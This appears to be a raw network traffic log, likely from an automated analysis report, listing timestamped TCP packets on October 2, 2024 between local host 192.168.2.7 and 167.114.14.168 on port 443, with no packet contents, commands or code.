                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497762918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.498640060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.498660088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.498688936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.498694897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.498732090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499211073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499232054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499258041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499264002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499279976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499298096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499802113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499824047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499850988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499856949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499886036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.499901056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.500524998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.508708954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.508735895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.508841991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.508841991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.508858919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.509197950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577465057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577490091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577560902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577569962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577606916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.577606916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.586978912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587002039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587094069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587094069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587101936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587153912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587409019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587430000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587493896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587493896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587502003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.587552071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588241100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588262081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588323116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588330984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588349104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.588453054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589173079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589200974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589235067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589241028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589274883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589274883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589731932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589751005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589791059 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589797974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589832067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.589832067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590513945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590538025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590599060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590599060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590605974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.590651035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599227905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599250078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599303007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599309921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599365950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.599406958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.633465052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668181896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668216944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668245077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668262005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668298006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.668298006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678114891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678154945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678222895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678235054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678235054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678248882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678267956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678282022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678309917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678837061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678858995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678916931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678916931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.678925991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.679898977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.679927111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.679955959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.679961920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680013895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680352926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680372000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680419922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680419922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.680427074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.681010962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.681036949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.681083918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.681083918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.681091070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.689893961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.689914942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.689996958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.689996958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.690005064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.742000103 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.758860111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.758894920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.758943081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.758953094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.758972883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.759021044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768111944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768136024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768213987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768213987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768223047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768354893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768675089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768699884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768759012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768759012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768765926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.768850088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769484997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769507885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769553900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769562006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769593954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.769593954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770365000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770385981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770416021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770421982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770459890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770459890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770844936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770869017 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770932913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770932913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.770939112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771079063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771538973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771558046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771608114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771615028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771646023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.771646023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780544996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780565977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780627966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780641079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780674934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.780674934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.849421978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.849457979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.849606991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.849636078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.849725962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858730078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858752012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858814955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858824015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858870029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.858870029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859112978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859133959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859172106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859178066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859205961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859246969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859922886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859944105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859989882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.859996080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.860032082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.860032082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.860963106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.860981941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861051083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861051083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861057997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861133099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861466885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861488104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861556053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861556053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861562014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.861649990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862106085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862124920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862166882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862173080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862212896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.862212896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871437073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871460915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871526957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871536970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871577024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.871577978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.947449923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.947479963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.947603941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.947618961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.947674036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949224949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949248075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949316978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949326038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949337006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949368954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949680090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949704885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949757099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949763060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949775934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.949800968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950509071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950534105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950601101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950601101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950608015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.950654984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951421022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951442003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951478958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951486111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951518059 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.951546907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952064037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952085972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952130079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952136040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952150106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952193022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952704906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952728033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952794075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952794075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952800989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.952858925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.962074041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.962105036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.962198019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.962212086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.962344885 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189163923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189240932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189328909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189357042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189393997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189393997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189512014 CEST44349713167.114.14.168192.168.2.7
